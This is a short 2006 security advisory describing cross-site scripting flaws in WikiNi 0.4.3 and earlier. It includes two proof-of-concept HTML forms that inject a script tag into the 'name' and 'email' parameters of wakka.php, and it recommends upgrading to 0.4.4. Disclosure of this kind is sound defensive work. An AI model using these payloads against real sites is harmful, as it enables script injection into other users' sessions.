WikiNi Multiple Cross Site Scripting Vulnerabilities

Vendor: WikiNi
Vulnerable: WikiNi 0.4.3 and below
Bugtraq ID:20688
Secunia Advisory:SA22558
Release Date: 2006-10-24

Cross Site Scripting

The name parameter of page wakka.php is not properly sanitized:

<html>
<body>

<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php">

<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="name" value=">&quot;><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">

</form>

</body>
</html>
	

Cross Site Scripting

The email parameter of page wakka.php is not properly sanitized:

<html>
<body>

<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php">

<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="email" value=">&quot;><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">

</form>

</body>
</html>
	

Solution

Upgrade to 0.4.4.

• Advisories
• Cv
• Portfolio
• Liens

[zone14] - © 2004-2007 - Ce site est sous licence Creative Commons